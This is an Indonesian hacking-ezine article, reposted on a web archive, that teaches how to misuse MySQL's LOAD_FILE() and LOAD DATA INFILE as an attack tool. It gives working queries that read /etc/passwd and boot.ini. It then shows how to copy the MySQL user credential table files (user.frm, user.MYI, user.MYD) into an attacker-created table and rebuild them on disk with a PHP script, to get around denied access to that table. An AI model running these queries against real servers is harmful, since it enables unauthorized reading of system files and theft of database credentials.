Copy Link
Add to Bookmark
Report

Echo Magazine Issue 16 Phile 0x005

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  

echo|zine, volume 5 issue 16
Mysql hack: pemanfaatan fungsi LOAD_FILE & LOAD DATA INFILE
by az001 <az001 [at] plasa [dot] com>


---// Pendahuluan

Pada kesempatan kali ini saya akan mencoba mengajak anda menggunakan
MySQL menjadi sebuah tools hacking menggunakan 2 fungsi yang ada dalam MySQL.

---// Keterangan & Contoh Penggunaan LOAD_FILE() & LOAD DATA INFILE

Fungsi yang kita akan gunakan adalah load_file() dan LOAD DATA
INFILE, berikut ini adalah keterangannya

- LOAD_FILE()

Dengan fungsi ini, kita dapat membaca file-file yang terdapat
pada server MySQL tersebut dan menampilkannya ke layar.

Contoh :

//--- query ----//

mysql> SELECT LOAD_FILE('/etc/passwd');
atau
mysql> SELECT LOAD_FILE('c:/boot.ini');

//--- query ----//

Maka akan menampilkan isi dari file passwd atau file boot.ini

- LOAD DATA INFILE

Dengan fungsi ini, kita dapat mengambil isi file dan menaruhnya kedalam database;

Contoh :

//--- query ----//

mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE namatable;
atau
mysql> LOAD DATA INFILE 'c:/boot.ini' INTO TABLE namatable;

//--- query ----//

Maka perintah tersebut akan mengambil isi file passwd atau file
boot.ini dan menaruhnya ke tabel namatable.


Dengan fungsi-fungsi tersebut,kemungkinan kita juga dapat mengambil
file-file database (.MYI,.frm,.MYD) dari server tersebut selama file-file
tersebut BISA DIBACA OLEH SEMUA USER.


---// Mengapa mengambil file-file tersebut ?

Sebenarnya anda bisa saja mengambil file-file yang lain, tetapi
jika user mysql anda tidak diizinkan untuk mengakses database mysql, anda
dapat menggunakan langkah-langkah ini.

Contoh :

Misal :

- Sistem operasi target adalah Windows
- Direktori MySQL ada di C:\MySQL


Langkah yang kita lakukan sebelumnya adalah mencoba untuk membuat

- Database dengan nama db_dudulz
- Tabel dengan nama tbl_dudulz yang memiliki field fl_namafile dengan tipe data varchar
dan field fl_content dengan tipe data longblob;

//--- query ----//

mysql> create database db_dudulz;
mysql> use db_dudulz;
mysql> create table tbl_dudulz (fl_namafile varchar(20),fl_content longblob);

//--- query ----//


Setelah itu kita akan mengambil isi file .MYI,.frm,.MYD dari
direktori C:\MySQL\data\mysql\, dalam hal ini kita hanya mengambil file table user
yakni file user.frm, user.MYI, user.MYD .


//--- query ----//

mysql> insert into tbl_dudulz values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_dudulz values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_dudulz values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));


//--- query ----//


---// Ambil Isi File

Setelah berhasil memasukkan isi dari file-file tersebut anda dapat
mengambil isi file tersebut dari database db_dudulz tadi dan menjadikannya
file.

Ini adalah salah satu contohnya dengan PHP

//------------------- code --------------------------------//

<?

$conn = mysql_connect("localhost","username","password");
mysql_select_db("db_dudulz");

$sql = "SELECT * FROM tbl_dudulz";
$query = mysql_query($sql,$conn);

while($row=mysql_fetch_row($query))
{
$bfile = fopen($row[0],"w");

fwrite($bfile,$row[1],strlen($row[1]));
fclose($bfile);

}
mysql_close($conn);

?>

//------------------- code --------------------------------//


Setelah anda menjalankan script php tadi, lihatlah di direktori
script itu berada. Disana akan terdapat 3 file yakni user.frm , user.MYD
dan user.MYI.

Kita juga dapat mengambil isi database ini melalui MySQL GUI atau
tool-tool sejenisnya.


---// Catatan

Sebagai catatan, hal ini MUNGKIN tidak dapat dilakukan pada
sistem operasi keluarga Unix atau GNU/LINUX karena seperti yang
saya telah sampaikan tadi, fungsi-fungsi tersebut hanya dapat membaca file yang
bisa dibaca oleh semua user. Karena sepengetahuan saya default di sistem
operasi Windows hak akses membaca pada direktori MySQL dapat dilakukan oleh
hampir semua user.

Berbeda dengan sistem operasi keluarga Unix atau GNU/Linux dan
sejenisnya yang sepengetahuan saya defaultnya memiliki hak akses seperti
berikut ini :

-rw-rw---- 1 mysql mysql 248 2006-10-31 00:10 user.MYD
-rw-rw---- 1 mysql mysql 2048 2006-10-31 00:10 user.MYI
-rw-rw---- 1 mysql mysql 10330 2006-10-30 23:58 user.frm

File - file tersebut bisa saja diakses melalui fungsi-fungsi
tersebut jika memiliki hak akses sebagai berikut :

-rw-rw-rw- 1 mysql mysql 248 2006-10-31 00:10 user.MYD
-rw-rw-rw- 1 mysql mysql 2048 2006-10-31 00:10 user.MYI
-rw-rw-rw- 1 mysql mysql 10330 2006-10-30 23:58 user.frm


---// Penutup

Selamat mencoba menggunakan MySQL sebagai hacking tools, semoga
artikel ini dapat berguna bagi kita semua.


---// Referensi

- MySQL Manual http://www.mysql.com
- PHP Manual http://www.php.net


---// Shoutz

- echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,lirva32,
anonymous
- seviour , anak2 ksl-bl
- yang baca artikel ini

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT